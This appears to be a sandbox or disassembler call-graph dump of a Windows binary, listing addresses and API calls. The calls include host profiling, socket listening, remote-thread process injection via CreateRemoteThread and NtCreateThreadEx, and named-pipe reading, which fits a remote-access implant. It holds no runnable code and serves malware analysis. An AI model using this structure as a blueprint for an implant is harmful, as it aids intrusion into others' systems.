19065->19015 19067 46b9cdd 19066->19067 19068 46b9cf5 19066->19068 19069 46b0e1f __locking 66 API calls 19067->19069 19070 46b0e1f __locking 66 API calls 19068->19070 19072 46b9d3a 19068->19072 19071 46b9ce2 19069->19071 19073 46b9d23 19070->19073 19074 46b0e0c _calloc 66 API calls 19071->19074 19072->19050 19075 46b0e0c _calloc 66 API calls 19073->19075 19076 46b9cea 19074->19076 19077 46b9d2a 19075->19077 19076->19050 19078 46b2df7 __fsopen 6 API calls 19077->19078 19078->19072 19079->19043 19083 46b9de7 RtlLeaveCriticalSection 19080->19083 19082 46b655c 19082->18953 19083->19082 19085 46b3cf9 19084->19085 19088 46b3ab1 19085->19088 19089 46b00cd _LocaleUpdate::_LocaleUpdate 76 API calls 19088->19089 19092 46b3ac6 19089->19092 19090 46b3ad8 19091 46b0e0c _calloc 66 API calls 19090->19091 19093 46b3add 19091->19093 19092->19090 19096 46b3b15 19092->19096 19094 46b2df7 __fsopen 6 API calls 19093->19094 19099 46b3aed 19094->19099 19097 46b3b5a 19096->19097 19100 46b7915 19096->19100 19098 46b0e0c _calloc 66 API calls 19097->19098 19097->19099 19098->19099 19101 46b00cd _LocaleUpdate::_LocaleUpdate 76 API calls 19100->19101 19102 46b7929 19101->19102 19103 46b78ca __isleadbyte_l 76 API calls 19102->19103 19106 46b7936 19102->19106 19104 46b795e 19103->19104 19107 46ba658 19104->19107 19106->19096 19108 46b00cd _LocaleUpdate::_LocaleUpdate 76 API calls 19107->19108 19109 46ba66b 19108->19109 19112 46ba49e 19109->19112 19113 46ba4ea 19112->19113 19114 46ba4bf GetStringTypeW 19112->19114 19115 46ba5d1 19113->19115 19117 46ba4d7 19113->19117 19116 46ba4df GetLastError 19114->19116 19114->19117 19119 46bc0b0 ___ansicp 84 API calls 19115->19119 19116->19113 19118 46ba523 MultiByteToWideChar 19117->19118 19130 46ba5cb 19117->19130 19120 46ba550 19118->19120 19118->19130 19122 46ba5f5 19119->19122 19125 46ba565 _memset 19120->19125 19126 46aea1b _malloc 66 API calls 19120->19126 19121 46b655e failwithmessage 5 API calls 19123 46ba656 19121->19123 19124 46ba622 GetStringTypeA 19122->19124 19127 46bc0f9 ___convertcp 73 API calls 19122->19127 19122->19130 19123->19106 19129 46ba63d 19124->19129 19124->19130 19128 46ba59e MultiByteToWideChar 19125->19128 19125->19130 19126->19125 19131 46ba616 19127->19131 19132 46ba5c5 19128->19132 19133 46ba5b4 GetStringTypeW 19128->19133 19134 46ae93e __getstream 66 API calls 19129->19134 19130->19121 19131->19124 19131->19130 19135 46b74c0 __freea 66 API calls 19132->19135 19133->19132 19134->19130 19135->19130 19143 46af151 19136->19143 19138 46af28e 19138->18724 19142 46a722e 19139->19142 19140 46b655e failwithmessage 5 API calls 19141 46a731e 19140->19141 19141->18724 19142->19140 19144 46af15d __fsopen 19143->19144 19145 46b1075 __lock 66 API calls 19144->19145 19146 46af164 19145->19146 19147 46af21d _doexit 19146->19147 19149 46b03d1 __decode_pointer 6 API calls 19146->19149 19160 46af268 19147->19160 19151 46af19b 19149->19151 19151->19147 19154 46b03d1 __decode_pointer 6 API calls 19151->19154 19153 46af265 __fsopen 19153->19138 19159 46af1b0 19154->19159 19155 46af25c 19156 46af061 __mtinitlocknum 3 API calls 19155->19156 19156->19153 19157 46b03d1 6 API calls __decode_pointer 19157->19159 19158 46b03c8 6 API calls ___crtMessageBoxW 19158->19159 19159->19147 19159->19157 19159->19158 19161 46af26e 19160->19161 19162 46af249 19160->19162 19165 46b0f9b RtlLeaveCriticalSection 19161->19165 19162->19153 19164 46b0f9b RtlLeaveCriticalSection 19162->19164 19164->19155 19165->19162 19167 46a0d71 19166->19167 19233 46a7461 19167->19233 19169 46af27d 66 API calls 19170 46a0d8d 19169->19170 19170->19169 19172 469ce3c GetCurrentProcessId GetTickCount 19170->19172 19239 46bd4e0 19170->19239 19172->18424 19174 469747c 5 API calls 19173->19174 19175 46944db 19174->19175 19175->18427 19177 46a45db CheckTokenMembership 19176->19177 19178 469ce90 19176->19178 19179 46a45ed 19177->19179 19180 46a45f0 FreeSid 19177->19180 19181 46967cd htonl htonl 19178->19181 19179->19180 19180->19178 19181->18435 19183 4696882 19182->19183 19184 4696860 _memcpy_s 19182->19184 19183->18438 19185 469686e htonl 19184->19185 19185->19183 19187 4696851 htonl 19186->19187 19188 469681c GetCurrentProcessId 19187->19188 19188->18444 19190 4696851 htonl 19189->19190 19191 469683c 19190->19191 19192 469683f 19191->19192 19193 4696851 htonl 19192->19193 19194 469684e 19193->19194 19195 469cca3 19194->19195 19196 469cf5f 66 API calls 19195->19196 19197 469ccb6 19196->19197 19198 469ccf8 GetUserNameA GetComputerNameA 19197->19198 19309 469737d 19198->19309 19201 469cd36 _strrchr 19202 469cd53 GetVersionExA 19201->19202 19203 469683f htonl 19202->19203 19204 469cd79 19203->19204 19205 469683f htonl 19204->19205 19206 469cd84 19205->19206 19207 469681f 2 API calls 19206->19207 19208 469cd8f 19207->19208 19209 4696802 2 API calls 19208->19209 19210 469cd97 19209->19210 19211 4696802 2 API calls 19210->19211 19212 469cda3 19211->19212 19213 4696802 2 API calls 19212->19213 19214 469cdaf 19213->19214 19215 4696802 2 API calls 19214->19215 19216 469cdb8 19215->19216 19217 46aeb76 __snprintf 102 API calls 19216->19217 19218 469cdd0 19217->19218 19219 4696851 htonl 19218->19219 19220 469cdf4 19219->19220 19312 469cfaa 19220->19312 19223 469688c htonl 19223->18453 19225 46a0e09 19224->19225 19330 46a6eca 19225->19330 19227 46a0e35 19228 46af27d 66 API calls 19227->19228 19230 46a0e60 19227->19230 19354 46a7396 19227->19354 19228->19227 19230->18455 19232 46989a1 19231->19232 19232->18428 19235 46a746c 19233->19235 19234 46a7480 19234->19170 19235->19234 19236 46aea1b _malloc 66 API calls 19235->19236 19238 46a748f 19236->19238 19237 46ae93e __getstream 66 API calls 19237->19234 19238->19234 19238->19237 19242 46bd504 19239->19242 19241 46bdcdf 19241->19170 19243 46bef99 19242->19243 19244 46bef9b 19243->19244 19245 46bef9c 19243->19245 19244->19241 19248 46bf70e 19245->19248 19249 46bf71b 19248->19249 19250 46befb1 19249->19250 19252 46bf515 19249->19252 19250->19241 19254 46bf54b failwithmessage 19252->19254 19253 46bf563 MultiByteToWideChar 19255 46bf57e MultiByteToWideChar 19253->19255 19256 46bf59c 19253->19256 19254->19253 19255->19256 19273 46bf463 19256->19273 19258 46bf5ab 19260 46bf5c5 19258->19260 19277 46bf4b3 19258->19277 19261 46bf6ff 19260->19261 19262 46bf6f9 DebugBreak 19260->19262 19263 46bf5ee IsDebuggerPresent 19260->19263 19264 46bf5fc 19260->19264 19265 46b655e failwithmessage 5 API calls 19261->19265 19262->19261 19263->19262 19263->19264 19281 46bfe9d VirtualQuery 19264->19281 19267 46bf70c 19265->19267 19267->19250 19269 46bf65d WideCharToMultiByte 19270 46bf698 WideCharToMultiByte 19269->19270 19271 46bf68c 19269->19271 19272 46bf632 19270->19272 19271->19270 19272->19261 19272->19262 19292 46b1b6c 19273->19292 19275 46bf46f RaiseException 19276 46bf4a2 __fsopen 19275->19276 19276->19258 19293 46b1b6c 19277->19293 19279 46bf4bf RaiseException 19280 46bf504 __fsopen 19279->19280 19280->19260 19282 46bfed2 GetModuleFileNameW 19281->19282 19287 46bf627 19281->19287 19283 46bfee5 19282->19283 19282->19287 19284 46bff65 GetProcAddress 19283->19284 19283->19287 19294 46bfcf7 19283->19294 19284->19287 19288 46bff7a 19284->19288 19287->19269 19287->19272 19288->19287 19290 46c006c GetProcessHeap RtlAllocateHeap 19288->19290 19291 46c0051 GetProcessHeap HeapFree 19288->19291 19290->19287 19290->19291 19291->19287 19292->19275 19293->19279 19295 46bfd1c LoadLibraryA 19294->19295 19302 46bfd15 19294->19302 19296 46bfd3d LoadLibraryA 19295->19296 19295->19302 19298 46bfd4b GetProcAddress 19296->19298 19296->19302 19297 46b655e failwithmessage 5 API calls 19299 46bfe9b 19297->19299 19300 46bfd6a GetProcAddress 19298->19300 19298->19302 19299->19284 19299->19287 19301 46bfd7d GetProcAddress 19300->19301 19300->19302 19301->19302 19303 46bfd95 19301->19303 19302->19297 19304 46bfe85 FreeLibrary 19303->19304 19305 46bfe01 FreeLibrary 19303->19305 19304->19302 19305->19302 19307 46bfe3a 19305->19307 19307->19307 19308 46bfe76 LoadLibraryA 19307->19308 19308->19302 19318 4697388 19309->19318 19313 469cfb8 19312->19313 19314 46ae93e __getstream 66 API calls 19313->19314 19315 469cfbf 19314->19315 19316 46ae93e __getstream 66 API calls 19315->19316 19317 469cdfd 19316->19317 19317->19223 19325 46972db 19318->19325 19320 46973a3 WSASocketA 19321 4697385 GetModuleFileNameA 19320->19321 19322 46973bd WSAIoctl 19320->19322 19321->19201 19324 46973e1 closesocket 19322->19324 19324->19321 19326 46972f0 WSAStartup 19325->19326 19329 4697312 19325->19329 19327 4697306 WSACleanup 19326->19327 19326->19329 19328 46af27d 66 API calls 19327->19328 19328->19329 19329->19320 19358 46a7b8c 19330->19358 19337 46a7058 19338 46ae93e __getstream 66 API calls 19337->19338 19339 46a7060 19338->19339 19341 46a8061 66 API calls 19339->19341 19340 46a6fd4 19375 46a8061 19340->19375 19343 46a7076 19341->19343 19349 46a712a 19343->19349 19350 46a7097 19343->19350 19353 46a6f3a 19343->19353 19345 46a704a 19348 46ae93e __getstream 66 API calls 19345->19348 19346 46a703f 19347 46ae93e __getstream 66 API calls 19346->19347 19347->19353 19348->19353 19352 46a8061 66 API calls 19349->19352 19349->19353 19351 46a8061 66 API calls 19350->19351 19350->19353 19351->19353 19352->19353 19353->19227 19355 46a73a6 19354->19355 19357 46a73c7 19355->19357 19395 46a8163 19355->19395 19357->19227 19359 46a7b9a 19358->19359 19360 46a6f1a 19358->19360 19359->19360 19383 46aa0e8 19359->19383 19360->19353 19362 46bcb50 19360->19362 19363 46bc2dc __calloc_impl 66 API calls 19362->19363 19364 46bcb6a 19363->19364 19365 46a6f31 19364->19365 19366 46b0e0c _calloc 66 API calls 19364->19366 19365->19353 19369 46a7bfd 19365->19369 19367 46bcb7d 19366->19367 19367->19365 19368 46b0e0c _calloc 66 API calls 19367->19368 19368->19365 19370 46a6fc9 19369->19370 19371 46a7c10 19369->19371 19370->19337 19370->19340 19371->19370 19374 46a7bfd 5 API calls 19371->19374 19386 46a9647 19371->19386 19390 46a928b 19371->19390 19374->19371 19376 46a8072 19375->19376 19381 46a7032 19375->19381 19377 46bcb50 _calloc 66 API calls 19376->19377 19376->19381 19378 46a80a3 19377->19378 19380 46a7bfd 5 API calls 19378->19380 19378->19381 19382 46a80fb 19378->19382 19379 46ae93e __getstream 66 API calls 19379->19381 19380->19382 19381->19345 19381->19346 19382->19379 19384 46aea1b _malloc 66 API calls 19383->19384 19385 46aa0f4 19384->19385 19385->19359 19389 46a9664 19386->19389 19387 46b655e failwithmessage 5 API calls 19388 46a97b2 19387->19388 19388->19371 19389->19387 19391 46a929a 19390->19391 19394 46a92a2 19390->19394 19391->19371 19392 46a9647 5 API calls 19392->19394 19393 46a7bfd 5 API calls 19393->19394 19394->19391 19394->19392 19394->19393 19396 46a8170 19395->19396 19397 46a8193 _memcpy_s 19396->19397 19401 46a7356 19396->19401 19397->19357 19398 46a81c0 19398->19397 19399 46a7356 5 API calls 19398->19399 19399->19398 19402 46a51db 5 API calls 19401->19402 19403 46a7364 19402->19403 19403->19398 19405 4699bfc _memset 19404->19405 19406 4699c0e htonl 19405->19406 19409 4699c24 19405->19409 19407 4699c36 19406->19407 19406->19409 19421 4696131 19407->19421 19409->18461 19422 4696141 19421->19422 19511 469cff3 19422->19511 19426 4696171 19512 4696164 19511->19512 19513 469d004 htonl 19511->19513 19514 469d14d 19512->19514 19513->19512 19515 469cff3 htonl 19514->19515 19516 469d159 19515->19516 19516->19426 19749 46a1dac 19748->19749 19751 46a1db4 19748->19751 19749->18469 19750 46a1de6 19752 46a1d83 66 API calls 19750->19752 19751->19750 19754 46a1dd9 19751->19754 19753 46a1de0 19752->19753 19753->18469 19765 46a1d83 19754->19765 19757 46aec25 __time64 GetSystemTimeAsFileTime 19756->19757 19758 46a1e2a 19757->19758 19759 46aec25 __time64 GetSystemTimeAsFileTime 19758->19759 19760 46a1e45 19758->19760 19759->19760 19761 46a1eb4 19760->19761 19763 46aec25 __time64 GetSystemTimeAsFileTime 19760->19763 19762 46aec25 __time64 GetSystemTimeAsFileTime 19761->19762 19764 46a1f2e 19761->19764 19762->19764 19763->19761 19764->18469 19768 46aefbb 19765->19768 19769 46b061d __getptd 66 API calls 19768->19769 19770 46a1d8b 19769->19770 19770->19753 19772 46a401f RevertToSelf 19771->19772 19773 4696c4c 19771->19773 19772->19773 19774 4696bc4 19773->19774 19775 4696c33 19774->19775 19776 4696bda 19774->19776 19775->18475 19780 46957f4 19775->19780 19776->19775 19802 4695770 19776->19802 19779 4696c12 InternetSetOptionA InternetSetOptionA 19779->19775 19781 469580a 19780->19781 19782 4695815 19781->19782 19783 46958a4 InternetConnectA 19781->19783 19784 469a042 66 API calls 19782->19784 19785 469589f 19783->19785 19786 4695825 19784->19786 19785->18477 19787 469a042 66 API calls 19786->19787 19803 469577c 19802->19803 19804 4695781 19803->19804 19805 46957e0 InternetOpenA 19803->19805 19806 469a042 66 API calls 19804->19806 19817 46957da 19805->19817 19807 469578c 19806->19807 19817->19775 19817->19779 19819 46970e4 _memset 19818->19819 19858 469ea45 19819->19858 19859 469ea54 19858->19859 19860 469cf5f 66 API calls 19859->19860 19861 469ea6b 19860->19861 19867 46a2228 19866->19867 19873 46a22a2 19866->19873 19868 46a22a4 19867->19868 19870 46a222d 19867->19870 19869 46a213a 139 API calls 19868->19869 19868->19873 19869->19868 19871 46a226b 19870->19871 19870->19873 19875 46a213a 19870->19875 19871->19873 19874 46a213a 139 API calls 19871->19874 19873->18494 19874->19871 19876 46a214b 19875->19876 19892 46a2213 19875->19892 19877 46958bf 66 API calls 19876->19877 19876->19892 19878 46a2162 19877->19878 19892->19870 19908 469db8c GetTickCount 19907->19908 19927 469d92b 19907->19927 19908->18499 19909 469d93a htonl select 19910 469d9b2 __WSAFDIsSet 19909->19910 19909->19927 19911 469d9c9 accept ioctlsocket 19910->19911 19910->19927 19915 469db8e closesocket 19911->19915 19916 469d9f3 19911->19916 19912 469da67 __WSAFDIsSet 19917 469da7e accept 19912->19917 19912->19927 19913 469dacc __WSAFDIsSet 19918 469dad9 __WSAFDIsSet 19913->19918 19913->19927 19914 469daf3 __WSAFDIsSet 19919 469dafc __WSAFDIsSet 19914->19919 19914->19927 19915->19908 19916->19927 19929 46958bf 66 API calls 19916->19929 19932 469590f htonl 19916->19932 19933 4694495 139 API calls 19916->19933 19934 4695a58 66 API calls 19916->19934 19957 469d308 19916->19957 19961 469cbab ioctlsocket 19917->19961 19921 469db5d GetTickCount 19918->19921 19918->19927 19922 469db0f __WSAFDIsSet 19919->19922 19919->19927 19921->19927 19922->19921 19923 469db22 accept 19922->19923 19928 469db3c 19923->19928 19926 4694495 139 API calls 19926->19927 19927->19908 19927->19909 19927->19912 19927->19913 19927->19914 19927->19926 19962 469c387 19927->19962 19930 4694495 139 API calls 19928->19930 19929->19916 19931 469db50 closesocket 19930->19931 19931->19927 19932->19916 19933->19916 19934->19916 19936 469dc58 19935->19936 19942 469dc62 19935->19942 19937 46aea1b _malloc 66 API calls 19936->19937 19937->19942 19938 469dd81 19938->18502 19938->18503 19939 469dc89 htonl recvfrom 19941 469dcc3 WSAGetLastError 19939->19941 19939->19942 19940 469dcf6 htonl ioctlsocket 19940->19942 19941->19942 19942->19938 19942->19939 19942->19940 19943 469dd28 19942->19943 19944 4694495 139 API calls 19942->19944 19943->19942 19975 469d2bc 19943->19975 19944->19942 19949 469dbad 19946->19949 19956 469dbd2 19946->19956 19949->19956 19956->17896 19958 46aea1b _malloc 66 API calls 19957->19958 19959 469d314 GetTickCount 19958->19959 19961->19927 19964 469c3ad _memset 19962->19964 19963 469c407 19963->19927 19964->19963 19965 469c40f 19964->19965 19966 469c400 19964->19966 19967 469c44a 19965->19967 19969 46aea1b _malloc 66 API calls 19965->19969 19968 4696af1 139 API calls 19966->19968 19970 469590f htonl 19967->19970 19968->19963 19969->19967 19971 469c470 19970->19971 19972 469590f htonl 19971->19972 19973 469c47c 19972->19973 19976 469d2ca recv 19975->19976 19979 469d2ea 19975->19979 19977 469d2f0 shutdown closesocket 19976->19977 19978 469d2e5 19976->19978 19977->19979 19978->19976 19978->19979 19979->19943 19981 4699b2b 19980->19981 19982 4699b42 19980->19982 19991 4696ad9 19981->19991 19984 4699ab4 19982->19984 19985 4696af1 139 API calls 19982->19985 19984->18512 19985->19984 19987 4699e6c 19986->19987 19988 4699e8e 19986->19988 19987->19988 19994 b10bb0 19987->19994 19988->18517 19992 4696a00 139 API calls 19991->19992 19993 4696aec 19992->19993 19993->19982 19995 b10bc5 19994->19995 19996 b10bbc 19994->19996 19996->19995 20065 4699d8a _memset 20064->20065 20066 4699d9d 20064->20066 20067 46ae93e __getstream 66 API calls 20065->20067 20066->18520 20067->20066 20069 469c291 20068->20069 20070 469c2a1 20069->20070 20071 46ae93e __getstream 66 API calls 20069->20071 20072 46a4c8f 20070->20072 20071->20069 20077 46a4ca1 _memset 20072->20077 20078 46a4d0a 20072->20078 20073 46a4d1b 20075 46ae93e __getstream 66 API calls 20073->20075 20076 46a3fa0 20073->20076 20074 46ae93e __getstream 66 API calls 20074->20073 20075->20076 20076->18530 20076->18533 20076->18534 20077->20078 20079 46ae93e __getstream 66 API calls 20077->20079 20080 46a2b72 73 API calls 20077->20080 20078->20073 20078->20074 20079->20077 20080->20077 20082 46a3f2f 20081->20082 20083 46a3f3b 20081->20083 20084 46b03d1 __decode_pointer 6 API calls 20082->20084 20083->18535 20083->18540 20084->20083 20086 46a2eeb 20085->20086 20087 46a2e72 20085->20087 20089 46a2ef7 20086->20089 20099 46a2f6e 20086->20099 20088 46a2e82 20087->20088 20087->20099 20090 469a042 66 API calls 20088->20090 20091 469a042 66 API calls 20089->20091 20093 46a2e8f 20090->20093 20094 46a2f04 20091->20094 20092 46a3004 20095 46a301b CreateRemoteThread 20092->20095 20096 46a3013 CreateThread 20092->20096 20097 469a042 66 API calls 20093->20097 20098 469a042 66 API calls 20094->20098 20115 46a2ee3 WaitForSingleObject 20095->20115 20096->20115 20102 46a2e9f 20097->20102 20103 46a2f14 20098->20103 20099->20092 20100 46a2fa8 20099->20100 20101 46a2fa2 GetCurrentProcess 20099->20101 20104 46a2fc4 NtCreateThreadEx 20100->20104 20110 46a2fcc 20100->20110 20101->20100 20105 469a042 66 API calls 20102->20105 20106 469a042 66 API calls 20103->20106 20104->20110 20108 46a2eab 20105->20108 20107 46a2f20 20106->20107 20109 469a042 66 API calls 20107->20109 20112 469a042 66 API calls 20108->20112 20114 46a2f2e 20109->20114 20110->20092 20111 46a2ff0 20110->20111 20111->20115 20129 46a2dc8 20111->20129 20113 46a2eb9 20112->20113 20116 469a042 66 API calls 20113->20116 20117 469a042 66 API calls 20114->20117 20115->17847 20119 46a2ec5 20116->20119 20120 46a2f3a 20117->20120 20121 469a042 66 API calls 20119->20121 20122 469a042 66 API calls 20120->20122 20123 46a2ed1 20121->20123 20124 46a2f46 20122->20124 20125 4699f1a 71 API calls 20123->20125 20126 469a042 66 API calls 20124->20126 20125->20115 20127 46a2f54 20126->20127 20128 4699f1a 71 API calls 20127->20128 20128->20115 20130 46a2dd3 20129->20130 20131 46a2dd8 20130->20131 20136 46a2dfc 20130->20136 20133 469a042 66 API calls 20131->20133 20132 46a2e58 ResumeThread 20132->20115 20134 46a2de7 20133->20134 20135 4699f1a 71 API calls 20134->20135 20137 46a2df6 20135->20137 20136->20132 20138 46a2e48 20136->20138 20137->20115 20138->20115 20141 46a7566 20139->20141 20140 46a757d 20140->18569 20141->20140 20142 46aea1b _malloc 66 API calls 20141->20142 20143 46a75a2 20142->20143 20143->20140 20152 46a839e 20143->20152 20153 46a83ac 20152->20153 20182 46994b8 htonl 20181->20182 20183 46994a8 20181->20183 20185 46994cf 20182->20185 20184 46aea1b _malloc 66 API calls 20183->20184 20187 46994b2 20184->20187 20186 46994fb 20185->20186 20193 46afdb2 20185->20193 20189 4694495 139 API calls 20186->20189 20187->20182 20190 4699512 20189->20190 20196 469951f 20190->20196 20202 46afd1c 20193->20202 20203 46afd28 __fsopen 20202->20203 20204 46afd3c _memset 20203->20204 20205 46afd71 20203->20205 20206 46afd66 __fsopen 20203->20206 20468 469bd09 PeekNamedPipe 20467->20468 20469 469bd9a 20467->20469 20468->20469 20473 469bd2b 20468->20473 20469->18599 20470 469bd3c htonl 20471 469bd9f 20470->20471 20470->20473 20473->20469 20473->20470 20475 469bd73 PeekNamedPipe 20473->20475 20487 46a3a2c 20473->20487 20475->20469 20475->20473 20477 469bc3e 20476->20477 20481 469bc43 20476->20481 20477->20481 20493 469c854 20477->20493 20480 469c854 2 API calls 20480->20481 20481->18599 20483 469bc98 PeekNamedPipe 20482->20483 20484 469bca9 20483->20484 20485 469bcae 20483->20485 20484->18599 20485->20483 20485->20484 20486 46a3a2c 2 API calls 20485->20486 20486->20485 20488 46a3adb ReadFile 20487->20488 20489 46a3a43 20487->20489 20492 46a3aca 20488->20492 20489->20488 20490 46a3ac3 20489->20490 20491 46a3ab4 WaitForSingleObject 20489->20491 20490->20488 20490->20492 20491->20488 20491->20490 20492->20473 20494 469bc56 20493->20494 20495 469c868 20493->20495 20494->20480 20494->20481 20495->20494 20496 46a3a2c 2 API calls 20495->20496 20496->20495 20522 46a1781 20521->20522 20523 469d036 htons 20522->20523 20527 46a17a6 _memcpy_s 20523->20527 20524 46a184b _memset 20524->17913 20525 469d036 htons 20525->20527 20526 469cff3 htonl 20526->20527 20527->20524 20527->20525 20527->20526 20529 46a1892 20528->20529 20530 469d036 htons 20529->20530 20532 46a18a6 _memcpy_s 20530->20532 20531 46a1944 _memset 20531->17919 20532->20531 20533 469cff3 htonl 20532->20533 20534 469d036 htons 20532->20534 20533->20532 20534->20532 20537 46a1229 20535->20537 20538 46a123e 20535->20538 20537->20538 20539 46b0269 20537->20539 20538->17928 20540 46b0287 20539->20540 20541 46b0277 20539->20541 20543 46b0154 20540->20543 20541->20537 20544 46b00cd _LocaleUpdate::_LocaleUpdate 76 API calls 20543->20544 20545 46b0169 20544->20545 20546 46b01c9 20545->20546 20547 46b0175 20545->20547 20548 46b01ee 20546->20548 20549 46b78ca __isleadbyte_l 76 API calls 20546->20549 20551 46b7915 __isctype_l 90 API calls 20547->20551 20553 46b018d 20547->20553 20550 46b0e0c _calloc 66 API calls 20548->20550 20552 46b01f4 20548->20552 20549->20548 20550->20552 20551->20553 20555 46b7885 20552->20555 20553->20541 20556 46b00cd _LocaleUpdate::_LocaleUpdate 76 API calls 20555->20556 20557 46b7898 20556->20557 20560 46b74e0 20557->20560 20561 46b7501 LCMapStringW 20560->20561 20564 46b751c 20560->20564 20562 46b7524 GetLastError 20561->20562 20561->20564 20562->20564 20563 46b771a 20611 46bc0b0 GetLocaleInfoA 20563->20611 20564->20563 20565 46b7576 20564->20565 20567 46b758f MultiByteToWideChar 20565->20567 20588 46b7711 20565->20588 20573 46b75bc 20567->20573 20567->20588 20568 46b655e failwithmessage 5 API calls 20570 46b7883 20568->20570 20570->20553 20571 46b775b 20617 46bc0f9 20571->20617 20572 46b7836 LCMapStringA 20606 46b7792 20572->20606 20578 46aea1b _malloc 66 API calls 20573->20578 20585 46b75d5 20573->20585 20575 46b760d MultiByteToWideChar 20576 46b7626 LCMapStringW 20575->20576 20600 46b7708 20575->20600 20580 46b7647 20576->20580 20576->20600 20577 46b785d 20586 46ae93e __getstream 66 API calls 20577->20586 20577->20588 20578->20585 20584 46b7650 20580->20584 20590 46b7679 20580->20590 20581 46ae93e __getstream 66 API calls 20581->20577 20582 46b7777 LCMapStringA 20591 46b7799 20582->20591 20582->20606 20583 46b74c0 __freea 66 API calls 20583->20588 20587 46b7662 LCMapStringW 20584->20587 20584->20600 20585->20575 20585->20588 20586->20588 20587->20600 20588->20568 20589 46b76c8 LCMapStringW 20592 46b7702 20589->20592 20593 46b76e0 WideCharToMultiByte 20589->20593 20595 46aea1b _malloc 66 API calls 20590->20595 20603 46b7694 20590->20603 20594 46aea1b _malloc 66 API calls 20591->20594 20599 46b77aa _memset 20591->20599 20607 46b74c0 20592->20607 20593->20592 20594->20599 20595->20603 20597 46b77e8 LCMapStringA 20601 46b7808 20597->20601 20602 46b7804 20597->20602 20599->20597 20599->20606 20600->20583 20604 46bc0f9 ___convertcp 73 API calls 20601->20604 20605 46b74c0 __freea 66 API calls 20602->20605 20603->20589 20603->20600 20604->20602 20605->20606 20606->20577 20606->20581 20608 46b74dd 20607->20608 20609 46b74cc 20607->20609 20608->20600 20609->20608 20610 46ae93e __getstream 66 API calls 20609->20610 20610->20608 20612 46bc0de 20611->20612 20613 46bc0e3 20611->20613 20615 46b655e failwithmessage 5 API calls 20612->20615 20642 46aef88 20613->20642 20616 46b7742 20615->20616 20616->20571 20616->20572 20616->20588 20618 46bc139 GetCPInfo 20617->20618 20622 46bc1c3 20617->20622 20619 46bc1ae MultiByteToWideChar 20618->20619 20620 46bc150 20618->20620 20619->20622 20626 46bc169 _strlen 20619->20626 20620->20619 20623 46bc156 GetCPInfo 20620->20623 20621 46b655e failwithmessage 5 API calls 20624 46b776d 20621->20624 20622->20621 20623->20619 20625 46bc163 20623->20625 20624->20582 20624->20588 20625->20619 20625->20626 20627 46bc19b _memset 20626->20627 20628 46aea1b _malloc 66 API calls 20626->20628 20627->20622 20629 46bc1f8 MultiByteToWideChar 20627->20629 20628->20627 20630 46bc210 20629->20630 20634 46bc22f 20629->20634 20632 46bc217 WideCharToMultiByte 20630->20632 20633 46bc234 20630->20633 20631 46b74c0 __freea 66 API calls 20631->20622 20632->20634 20635 46bc23f WideCharToMultiByte 20633->20635 20636 46bc253 20633->20636 20634->20631 20635->20634 20635->20636 20637 46b7a12 __calloc_crt 66 API calls 20636->20637 20638 46bc25b 20637->20638 20638->20634 20639 46bc264 WideCharToMultiByte 20638->20639 20639->20634 20640 46bc276 20639->20640 20641 46ae93e __getstream 66 API calls 20640->20641 20641->20634 20643 46b3ce0 __wcstoi64 90 API calls 20642->20643 20653 671900 20654 671926 20653->20654 20655 6719f9 PostQuitMessage 20653->20655 20656 67192f 20654->20656 20657 6719cd BeginPaint EndPaint 20654->20657 20658 672dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20655->20658 20660 671956 20656->20660 20661 671936 DefWindowProcW 20656->20661 20659 672dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20657->20659 20662 671a0f 20658->20662 20663 6719f3 20659->20663 20665 6719a3 DialogBoxParamW 20660->20665 20666 671961 20660->20666 20676 672dbe 20661->20676 20667 672dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20665->20667 20669 671966 DefWindowProcW 20666->20669 20670 671988 DestroyWindow 20666->20670 20673 6719c7 20667->20673 20668 671950 20671 672dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20669->20671 20672 672dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20670->20672 20674 671982 20671->20674 20675 67199d 20672->20675 20677 672dc7 20676->20677 20678 672dc9 IsProcessorFeaturePresent 20676->20678 20677->20668 20680 6730c0 20678->20680 20683 673084 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20680->20683 20682 6731a3 20682->20668 20683->20682 20926 672efe 20927 672f0a ___scrt_is_nonwritable_in_current_image 20926->20927 20950 673337 20927->20950 20929 672f11 20930 673064 20929->20930 20934 672f3b 20929->20934 20979 67364f IsProcessorFeaturePresent 20930->20979 20932 67306b exit 20933 673071 _exit 20932->20933 20935 672f3f _initterm_e 20934->20935 20939 672f88 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 20934->20939 20936 672f6b _initterm 20935->20936 20937 672f5a 20935->20937 20936->20939 20938 672fdc 20954 673769 memset GetStartupInfoW 20938->20954 20939->20938 20942 672fd4 _register_thread_local_exe_atexit_callback 20939->20942 20942->20938 20947 673001 20948 673005 _cexit 20947->20948 20949 67300a ___scrt_uninitialize_crt 20947->20949 20948->20949 20949->20937 20951 673340 20950->20951 20983 67390e IsProcessorFeaturePresent 20951->20983 20953 67334c pre_c_initialization 20953->20929 20955 672fe1 _get_wide_winmain_command_line 20954->20955 20956 671480 WSAStartup GetUserNameW wcstombs_s memset strncat 20955->20956 20957 672180 74 API calls 20956->20957 20958 6715a4 8 API calls 20957->20958 20959 6718ac 20958->20959 20960 67169e UpdateWindow LoadIconW 20958->20960 20964 672dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20959->20964 20961 671707 LoadAcceleratorsW 20960->20961 20962 6716b2 lstrcpyW Shell_NotifyIconW 20960->20962 20963 67176d 20961->20963 20962->20961 20985 672870 20963->20985 20965 6718ee 20964->20965 20977 67379f GetModuleHandleW 20965->20977 20970 671890 20970->20959 20972 6718a6 terminate 20970->20972 20971 67181f 20973 671846 TranslateAcceleratorW 20971->20973 20974 671829 DialogBoxParamW 20971->20974 20972->20959 20975 671863 TranslateMessage DispatchMessageW 20973->20975 20976 67187d GetMessageW 20973->20976 20974->20973 20975->20976 20976->20970 20976->20971 20978 672ffd 20977->20978 20978->20932 20978->20947 20980 673664 ___scrt_fastfail 20979->20980 20981 673670 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 20980->20981 20982 67375a ___scrt_fastfail 20981->20982 